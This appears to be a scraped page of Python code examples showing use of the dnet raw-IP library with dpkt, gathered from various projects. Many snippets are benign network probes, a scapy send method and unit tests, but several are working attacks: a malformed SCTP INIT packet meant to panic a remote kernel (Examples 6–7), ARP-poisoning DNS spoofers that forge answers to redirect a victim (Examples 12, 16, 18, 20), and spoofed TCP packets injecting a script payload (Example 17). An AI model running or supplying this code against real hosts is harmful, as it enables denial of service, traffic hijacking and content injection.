Example #1
0
def confirm_max_mtu(host, hop, reported_payload_len=1024, src_ip=SRC_IP):
    icmp_sock = get_icmp_sock()

    ip = dnet.ip()

    udp = dpkt.udp.UDP(sport=SPORT, dport=hop)
    udp.data = 'A' * reported_payload_len
    udp.ulen += len(udp.data)
    pkt = dpkt.ip.IP(src=socket.inet_aton(src_ip),
                     dst=socket.inet_aton(host),
                     ttl=hop,
                     id=hop,
                     p=0x11)
    pkt.data = udp
    pkt.len += len(str(pkt.data))
    ip.send(str(pkt))

    timeout = time.time(
    ) + TIMEOUT  # give a few seconds for all routers to respond

    while time.time() < timeout:
        try:
            data, addr = icmp_sock.recvfrom(1508)
        except socket.timeout:
            return -1

        ip_pkt = dpkt.ip.IP(data)
        icmp_pkt = ip_pkt.data
        inner_ip_pkt = icmp_pkt.data.data
        udp_pkt = inner_ip_pkt.data
        payload = udp_pkt.data
        return len(payload) - len(payload.replace('A' * 8, ''))
    return -1
Example #2
0
def confirm_max_mtu(host, hop, reported_payload_len=1024, src_ip=SRC_IP):
    icmp_sock = get_icmp_sock()
    
    ip = dnet.ip()
    
    udp = dpkt.udp.UDP(sport=SPORT, dport=hop)
    udp.data = 'A'*reported_payload_len
    udp.ulen += len(udp.data)
    pkt = dpkt.ip.IP(src=socket.inet_aton(src_ip), dst=socket.inet_aton(host), ttl=hop, id=hop, p=0x11)
    pkt.data = udp 
    pkt.len += len(str(pkt.data))
    ip.send(str(pkt))

    timeout = time.time() + TIMEOUT  # give a few seconds for all routers to respond
    
    while time.time() < timeout:
        try:
            data, addr = icmp_sock.recvfrom(1508)
        except socket.timeout:
            return -1
         
        ip_pkt = dpkt.ip.IP(data) 
        icmp_pkt = ip_pkt.data
        inner_ip_pkt = icmp_pkt.data.data
        udp_pkt = inner_ip_pkt.data
        payload = udp_pkt.data
        return len(payload) - len(payload.replace('A'*8, ''))
    return -1 
Example #3
0
 def __init__ (self, ip, tcp):
     self.ip = ip
     self.tcp = tcp
     self.tcp.flags = dpkt.tcp.TH_ACK
     self.tcp.data = struct.pack('H', 0)
     self.sock = dnet.ip()
     threading.Thread.__init__(self)
Example #4
0
    def Send(self):
        ip = dnet.ip()

        for pkt in self.packets:
            data = str(pkt)
            data = dnet.ip_checksum(data)
            ip.send(data)
            time.sleep(0.10)
Example #5
0
    def Send(self):
        ip = dnet.ip()

        for pkt in self.packets:
            data = str(pkt)
            data = dnet.ip_checksum(data)
            ip.send(data)
            time.sleep(0.10)
Example #6
0
def main():
    if len(sys.argv) != 3:
        usage()

    host = sys.argv[1]
    port = int(sys.argv[2])

    try:
        sock = dnet.ip()
        intf = dnet.intf()
    except OSError:
        err('requires root privileges for raw socket access')

    dst_addr = socket.gethostbyname(host)
    interface = intf.get_dst(dnet.addr(dst_addr))
    src_addr = interface['addr'].ip

    msg('sending malformed SCTP INIT msg to %s:%s' % (dst_addr, port))

    invalid = ''
    invalid += '\x20\x10\x11\x73'
    invalid += '\x00\x00\xf4\x00'
    invalid += '\x00\x05'
    invalid += '\x00\x05'
    invalid += '\x20\x10\x11\x73'

    for i in xrange(20):
        invalid += '\xc0\xff\x00\x08\xff\xff\xff\xff'

    init = dpkt.sctp.Chunk()
    init.type = dpkt.sctp.INIT
    init.data = invalid
    init.len = len(init)

    sctp = dpkt.sctp.SCTP()
    sctp.sport = 0x1173
    sctp.dport = port
    sctp.data = [ init ]

    ip = dpkt.ip.IP()
    ip.src = src_addr
    ip.dst = dnet.ip_aton(dst_addr)
    ip.p = dpkt.ip.IP_PROTO_SCTP
    ip.data = sctp
    ip.len = len(ip)

    print `ip`

    pkt = dnet.ip_checksum(str(ip))
    sock.send(pkt)

    msg('kernel should have panicked on remote host %s' % (dst_addr))
Example #7
0
def main():
    if len(sys.argv) != 3:
        usage()

    host = sys.argv[1]
    port = int(sys.argv[2])

    try:
        sock = dnet.ip()
        intf = dnet.intf()
    except OSError:
        err('requires root privileges for raw socket access')

    dst_addr = socket.gethostbyname(host)
    interface = intf.get_dst(dnet.addr(dst_addr))
    src_addr = interface['addr'].ip

    msg('sending malformed SCTP INIT msg to %s:%s' % (dst_addr, port))

    invalid = ''
    invalid += '\x20\x10\x11\x73'
    invalid += '\x00\x00\xf4\x00'
    invalid += '\x00\x05'
    invalid += '\x00\x05'
    invalid += '\x20\x10\x11\x73'

    for i in xrange(20):
        invalid += '\xc0\xff\x00\x08\xff\xff\xff\xff'

    init = dpkt.sctp.Chunk()
    init.type = dpkt.sctp.INIT
    init.data = invalid
    init.len = len(init)

    sctp = dpkt.sctp.SCTP()
    sctp.sport = 0x1173
    sctp.dport = port
    sctp.data = [init]

    ip = dpkt.ip.IP()
    ip.src = src_addr
    ip.dst = dnet.ip_aton(dst_addr)
    ip.p = dpkt.ip.IP_PROTO_SCTP
    ip.data = sctp
    ip.len = len(ip)

    print ` ip `

    pkt = dnet.ip_checksum(str(ip))
    sock.send(pkt)

    msg('kernel should have panicked on remote host %s' % (dst_addr))
Example #8
0
def test_dest(dest, min_ttl=MIN_TTL, src_ip=SRC_IP):
    icmp_sock = get_icmp_sock()

    ip = dnet.ip()

    for ttl in range(min_ttl, MAX_TTL):
        udp = dpkt.udp.UDP(sport=SPORT, dport=ttl)
        udp.data = "pkt %d " % ttl
        udp.data += 'A' * 250
        udp.ulen += len(udp.data)
        pkt = dpkt.ip.IP(src=socket.inet_aton(src_ip),
                         dst=socket.inet_aton(dest),
                         ttl=ttl,
                         id=ttl,
                         p=0x11)
        pkt.data = udp
        pkt.len += len(str(pkt.data))
        ip.send(str(pkt))
        time.sleep(.001)

    timeout = time.time(
    ) + TIMEOUT  # give a few seconds for all routers to respond

    hops = {}

    while time.time() < timeout:
        try:
            data, addr = icmp_sock.recvfrom(1508)
        except socket.timeout:
            return hops

        ip_pkt = dpkt.ip.IP(data)
        icmp_pkt = ip_pkt.data
        inner_ip_pkt = icmp_pkt.data.data
        payload_data = inner_ip_pkt.data
        #print '%s (hop %d) sent %d bytes' % (addr[0], inner_ip_pkt.id, len(payload_data))
        hops[payload_data.dport] = (addr[0], len(payload_data))

        if (addr[0] == dest):
            return hops

    return hops
Example #9
0
 def send(self, x):
     iff, a, gw = x.route()
     if iff is None:
         iff = conf.iface
     ifs, cls = self.iflist.get(iff, (None, None))
     if ifs is None:
         iftype = self.intf.get(iff)["type"]
         if iftype == dnet.INTF_TYPE_ETH:
             try:
                 cls = conf.l2types[1]
             except KeyError:
                 warning("Unable to find Ethernet class. Using nothing")
             ifs = dnet.eth(iff)
         else:
             ifs = dnet.ip()
         self.iflist[iff] = ifs, cls
     if cls is None:
         sx = str(x)
     else:
         sx = str(cls() / x)
     x.sent_time = time.time()
     ifs.send(sx)
Example #10
0
 def send(self, x):
     iff, a, gw = x.route()
     if iff is None:
         iff = conf.iface
     ifs, cls = self.iflist.get(iff, (None, None))
     if ifs is None:
         iftype = self.intf.get(iff)["type"]
         if iftype == dnet.INTF_TYPE_ETH:
             try:
                 cls = conf.l2types[1]
             except KeyError:
                 warning("Unable to find Ethernet class. Using nothing")
             ifs = dnet.eth(iff)
         else:
             ifs = dnet.ip()
         self.iflist[iff] = ifs, cls
     if cls is None:
         sx = str(x)
     else:
         sx = str(cls() / x)
     x.sent_time = time.time()
     ifs.send(sx)
Example #11
0
def test_dest(dest, min_ttl=MIN_TTL, src_ip=SRC_IP):
    icmp_sock = get_icmp_sock()
    
    ip = dnet.ip()
    
    for ttl in range(min_ttl, MAX_TTL):
        udp = dpkt.udp.UDP(sport=SPORT, dport=ttl)
        udp.data = "pkt %d " % ttl
        udp.data += 'A'*250
        udp.ulen += len(udp.data)
        pkt = dpkt.ip.IP(src=socket.inet_aton(src_ip), dst=socket.inet_aton(dest), ttl=ttl, id=ttl, p=0x11)
        pkt.data = udp 
        pkt.len += len(str(pkt.data))
        ip.send(str(pkt))
        time.sleep(.001)
        
    
    timeout = time.time() + TIMEOUT  # give a few seconds for all routers to respond
    
    hops = {}

    while time.time() < timeout:
        try:
            data, addr = icmp_sock.recvfrom(1508)
        except socket.timeout:
            return hops
         
        ip_pkt = dpkt.ip.IP(data) 
        icmp_pkt = ip_pkt.data
        inner_ip_pkt = icmp_pkt.data.data
        payload_data = inner_ip_pkt.data
        #print '%s (hop %d) sent %d bytes' % (addr[0], inner_ip_pkt.id, len(payload_data))
        hops[payload_data.dport] = (addr[0], len(payload_data))

        if (addr[0] == dest):
            return hops

    return hops
Example #12
0
File: mitm.py Project: codepr/creak
    def dns_spoof(self, host=None, redirection=None):
        """
        Redirect all incoming request for 'host' to 'redirection'
        """
        pcap_filter = self._build_pcap_filter('udp dst port 53 and src ')
        redirection = gethostbyname(redirection)
        sock = dnet.ip()

        print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G + self.gateway + W
              + ' and ' + R
              + (','.join(self.target) if isinstance(self.target, list) else self.target) + W +'\n')
        # need to create a daemon that continually poison our target
        poison_thread = Thread(target=self.poison, args=(2, ))
        poison_thread.daemon = True
        poison_thread.start()

        packets = pcap.pcap(self.dev)
        packets.setfilter(pcap_filter)

        print('[+] Redirecting ' + G + host + W + ' to ' + G + redirection + W + ' for ' + R
              + (','.join(self.target) if isinstance(self.target, list) else self.target) + W)

        try:
            for _, pkt in packets:
                eth = dpkt.ethernet.Ethernet(pkt)
                ip_packet = eth.data
                udp = ip_packet.data
                dns = dpkt.dns.DNS(udp.data)
                # validate query
                if dns.qr != dpkt.dns.DNS_Q:
                    continue
                if dns.opcode != dpkt.dns.DNS_QUERY:
                    continue
                if len(dns.qd) != 1:
                    continue
                if len(dns.an) != 0:
                    continue
                if len(dns.ns) != 0:
                    continue
                if dns.qd[0].cls != dpkt.dns.DNS_IN:
                    continue
                if dns.qd[0].type != dpkt.dns.DNS_A:
                    continue
                # spoof for our target name
                if dns.qd[0].name != host:
                    continue

                # dns query->response
                dns.op = dpkt.dns.DNS_RA
                dns.rcode = dpkt.dns.DNS_RCODE_NOERR
                dns.qr = dpkt.dns.DNS_R

                # construct fake answer
                arr = dpkt.dns.DNS.RR()
                arr.cls, arr.type, arr.name = dpkt.dns.DNS_IN, dpkt.dns.DNS_A, host
                arr.ip = dnet.addr(redirection).ip

                dns.an.append(arr)

                udp.sport, udp.dport = udp.dport, udp.sport
                ip_packet.src, ip_packet.dst = ip_packet.dst, ip_packet.src
                udp.data, udp.ulen = dns, len(udp)
                ip_packet.len = len(ip_packet)

                print(inet_ntoa(ip_packet.src))

                buf = dnet.ip_checksum(str(ip_packet))
                sock.send(buf)

        except KeyboardInterrupt:
            print('[+] DNS spoofing interrupted\n\r')
            self.restore(2)
            utils.set_ip_forward(0)
Example #13
0
File: frag.py Project: ewust/nfrag
        else:
            cur_pkt.off = (offset/8) & dpkt.ip.IP_OFFMASK

        cur_pkt.data = data[offset:offset+off_step]
        cur_pkt.len = len(cur_pkt.data) + 20
        offset += off_step


        yield cur_pkt

def copy_ip(ip_pkt):
    new_pkt = dpkt.ip.IP(src=ip_pkt.src, dst=ip_pkt.dst, p=ip_pkt.p, ttl=ip_pkt.ttl, id=ip_pkt.id, off=ip_pkt.off, sum=ip_pkt.sum, len=ip_pkt.len)
    new_pkt.data = ip_pkt.data
    return new_pkt

net = dnet.ip()
dns = make_dns_pkt("twitter.com", srcip=sys.argv[1])


s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
s.bind(('eth0', 0))

def mac(x):
    return x.replace(':', '').decode('hex')

def send(pkt):
    global s

    #src = 'e8:2a:ea:5d:e9:f9'
    src = '28:d2:44:9a:8e:60'
    #dst = '00:23:33:ed:d4:14'
Example #14
0
 def setUp(self):
     self.ip = dnet.ip()
     self.failUnless(self.ip, "couldn't open raw IP handle")
Example #15
0
def inject_pkt(pkt):
    import dnet
    dnet.ip().send(pkt)
Example #16
0
def dns_spoof(dev,
              source_mac,
              source,
              target=None,
              host=None,
              redirection=None):
    redirection = gethostbyname(redirection)
    sock = dnet.ip()

    pcap_filter = 'udp dst port 53'

    if target:
        pcap_filter += ' and src %s' % target

    print('[+] Start poisoning on ' + G + dev + W + ' between ' + G + source +
          W + ' and ' + R + target + W)
    # need to create a daemon that continually poison our target
    thread = Thread(target=poison, args=(
        dev,
        source_mac,
        source,
        target,
        2,
    ))
    thread.daemon = True
    thread.start()

    pc = pcap.pcap(dev)
    pc.setfilter(pcap_filter)
    print('[+] Redirecting ' + G + host + W + ' to ' + G + redirection + W +
          ' for ' + R + target + W)

    try:
        for ts, pkt in pc:
            eth = dpkt.ethernet.Ethernet(pkt)
            ip = eth.data
            udp = ip.data
            dns = dpkt.dns.DNS(udp.data)
            # validate query
            if dns.qr != dpkt.dns.DNS_Q:
                continue
            if dns.opcode != dpkt.dns.DNS_QUERY:
                continue
            if len(dns.qd) != 1:
                continue
            if len(dns.an) != 0:
                continue
            if len(dns.ns) != 0:
                continue
            if dns.qd[0].cls != dpkt.dns.DNS_IN:
                continue
            if dns.qd[0].type != dpkt.dns.DNS_A:
                continue

            # spoof for our target name
            if dns.qd[0].name != host:
                continue

            # dns query->response
            dns.op = dpkt.dns.DNS_RA
            dns.rcode = dpkt.dns.DNS_RCODE_NOERR
            dns.qr = dpkt.dns.DNS_R

            # construct fake answer
            arr = dpkt.dns.DNS.RR()
            arr.cls = dpkt.dns.DNS_IN
            arr.type = dpkt.dns.DNS_A
            arr.name = host
            arr.ip = dnet.addr(redirection).ip
            # arr.ip = '\x4D\xEE\xB8\x96'

            dns.an.append(arr)

            udp.sport, udp.dport = udp.dport, udp.sport
            ip.src, ip.dst = ip.dst, ip.src
            udp.data = dns
            udp.ulen = len(udp)
            ip.len = len(ip)

            print(inet_ntoa(ip.src))

            buf = dnet.ip_checksum(str(ip))
            sock.send(buf)

    except KeyboardInterrupt:
        print('[+] DNS spoofing interrupted\n\r')
        utils.set_ip_forward(0)
Example #17
0
#!/usr/bin/python

import socket
import dpkt
import dnet
import sys
import time



net = dnet.ip()



html = '''<h1>Win.</h1><script type="text/javascript">alert('pwnd');</script>\n'''

HTTP = '''HTTP/1.1 200
Content-Type: text/html
Content-Length: %d

%s''' % (len(html)-1, html)

HTTP = 'HTTP'*((1000-len(HTTP))/4) + HTTP

print 'HTTP payload len: %d' % len(HTTP)

def make_pkt(dport, seq):
    ip = dpkt.ip.IP(src=socket.inet_aton('69.171.229.11'), \
        dst=socket.inet_aton('141.212.111.200'), p=0x06)
    tcp = dpkt.tcp.TCP(sport=80, dport=dport, data=HTTP, flags=0, seq=seq)
Example #18
0
    def dns_spoof(self, host=None, redirection=None):
        """
        Redirect all incoming request for 'host' to 'redirection'
        """
        pcap_filter = self._build_pcap_filter('udp dst port 53 and src ')
        redirection = gethostbyname(redirection)
        sock = dnet.ip()

        print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G +
              self.gateway + W + ' and ' + R +
              (','.join(self.target) if isinstance(self.target, list
                                                   ) else self.target) + W +
              '\n')
        # need to create a daemon that continually poison our target
        poison_thread = Thread(target=self.poison, args=(2, ))
        poison_thread.daemon = True
        poison_thread.start()

        packets = pcap.pcap(self.dev)
        packets.setfilter(pcap_filter)

        print('[+] Redirecting ' + G + host + W + ' to ' + G + redirection +
              W + ' for ' + R +
              (','.join(self.target) if isinstance(self.target, list
                                                   ) else self.target) + W)

        try:
            for _, pkt in packets:
                eth = dpkt.ethernet.Ethernet(pkt)
                ip_packet = eth.data
                udp = ip_packet.data
                dns = dpkt.dns.DNS(udp.data)
                # validate query
                if dns.qr != dpkt.dns.DNS_Q:
                    continue
                if dns.opcode != dpkt.dns.DNS_QUERY:
                    continue
                if len(dns.qd) != 1:
                    continue
                if len(dns.an) != 0:
                    continue
                if len(dns.ns) != 0:
                    continue
                if dns.qd[0].cls != dpkt.dns.DNS_IN:
                    continue
                if dns.qd[0].type != dpkt.dns.DNS_A:
                    continue
                # spoof for our target name
                if dns.qd[0].name != host:
                    continue

                # dns query->response
                dns.op = dpkt.dns.DNS_RA
                dns.rcode = dpkt.dns.DNS_RCODE_NOERR
                dns.qr = dpkt.dns.DNS_R

                # construct fake answer
                arr = dpkt.dns.DNS.RR()
                arr.cls, arr.type, arr.name = dpkt.dns.DNS_IN, dpkt.dns.DNS_A, host
                arr.ip = dnet.addr(redirection).ip

                dns.an.append(arr)

                udp.sport, udp.dport = udp.dport, udp.sport
                ip_packet.src, ip_packet.dst = ip_packet.dst, ip_packet.src
                udp.data, udp.ulen = dns, len(udp)
                ip_packet.len = len(ip_packet)

                print(inet_ntoa(ip_packet.src))

                buf = dnet.ip_checksum(str(ip_packet))
                sock.send(buf)

        except KeyboardInterrupt:
            print('[+] DNS spoofing interrupted\n\r')
            self.restore(2)
            utils.set_ip_forward(0)
Example #19
0
#from netfilterqueue import NetfilterQueue
import socket
import dpkt
import dnet
import time
import random
import sys
import select

RELAY = socket.inet_aton('68.40.51.184')
PROXY = socket.inet_aton('141.212.109.239')
MTU = 496 # must be divisible by 8
IFACE = "eth0"

out = dnet.ip()

routers = None
router_index = None

'''
Returns a (dest, ttl_hop, mtu) tuple that we know to be a 
router that will support TTL exceeded
'''
def get_router():
    global routers, router_index
    if routers == None:
        print 'Initializing routers...'
        import testbgp
        f = open("bgp-prefixes", "r")
        routers = testbgp.get_hops(f, 2)
Example #20
0
def dns_spoof(dev, source_mac, source, target = None, host = None, redirection = None):

		redirection = gethostbyname(redirection)
		sock = dnet.ip()
		filter = 'udp dst port 53'
		if target:
			filter += ' and src %s' % target
		print '[+] Start poisoning on ' + G + dev + W + ' between ' + G + source + W + ' and ' + R + target + W
		# need to create a daemon that continually poison our target
		thread = Thread(target = poison, args = (dev, source_mac, source, target, 2, ))
		thread.daemon = True
		thread.start()
		pc = pcap.pcap(dev)
		pc.setfilter(filter)
		print '[+] Redirecting ' + G + host + W + ' to ' + G + redirection + W + ' for ' + R + target + W
		try:
			for ts, pkt in pc:
				eth = dpkt.ethernet.Ethernet(pkt)
				ip = eth.data
				udp = ip.data
				dns = dpkt.dns.DNS(udp.data)
				# validate query
				if dns.qr != dpkt.dns.DNS_Q:
					continue
				if dns.opcode != dpkt.dns.DNS_QUERY:
					continue
				if len(dns.qd) != 1:
					continue
				if len(dns.an) != 0:
					continue
				if len(dns.ns) != 0:
					continue
				if dns.qd[0].cls != dpkt.dns.DNS_IN:
					continue
				if dns.qd[0].type != dpkt.dns.DNS_A:
					continue

				# spoof for our target name
				if dns.qd[0].name != host:
					continue

				# dns query->response
				dns.op = dpkt.dns.DNS_RA
				dns.rcode = dpkt.dns.DNS_RCODE_NOERR
				dns.qr = dpkt.dns.DNS_R

				# construct fake answer
				arr = dpkt.dns.DNS.RR()
				arr.cls = dpkt.dns.DNS_IN
				arr.type = dpkt.dns.DNS_A
				arr.name = host
				arr.ip = dnet.addr(redirection).ip
				# arr.ip = '\x4D\xEE\xB8\x96'

				dns.an.append(arr)

				udp.sport, udp.dport = udp.dport, udp.sport
				ip.src, ip.dst = ip.dst, ip.src
				udp.data = dns
				udp.ulen = len(udp)
				ip.len = len(ip)

				print inet_ntoa(ip.src)

				buf = dnet.ip_checksum(str(ip))
				try:
					sock.send(buf)
				except:
					pass

		except KeyboardInterrupt:
			print '[+] DNS spoofing interrupted\n\r'
			set_ip_forward(0)
Example #21
0
 def setUp(self):
     self.ip = dnet.ip()
     self.assertTrue(self.ip, "couldn't open raw IP handle")
Example #22
0
#!/usr/bin/python

# iptables -N pb_in
# iptables -A pb_in -p icmp -j NFQUEUE --queue-num 2
# iptables -A INPUT -j pb_in

from netfilterqueue import NetfilterQueue
import socket
import dpkt
import dnet

out = dnet.ip()


class PacketError(Exception):
    pass


def unnest_payload(bytes):
    ip = dpkt.ip.IP(bytes)
    if not isinstance(ip.data, dpkt.icmp.ICMP):
        raise PacketError
    icmp = ip.data
    if not isinstance(icmp.data, dpkt.icmp.ICMP.Unreach) and \
       not isinstance(icmp.data, dpkt.icmp.ICMP.TimeExceed):
        raise PacketError
    icmp_payload = icmp.data
    if not isinstance(icmp_payload.data, dpkt.ip.IP):
        raise PacketError
    ip2 = icmp_payload.data
    if not isinstance(ip2.data, dpkt.udp.UDP):
Example #23
0
 def setUp(self):
     self.ip = dnet.ip()
     self.failUnless(self.ip, "couldn't open raw IP handle")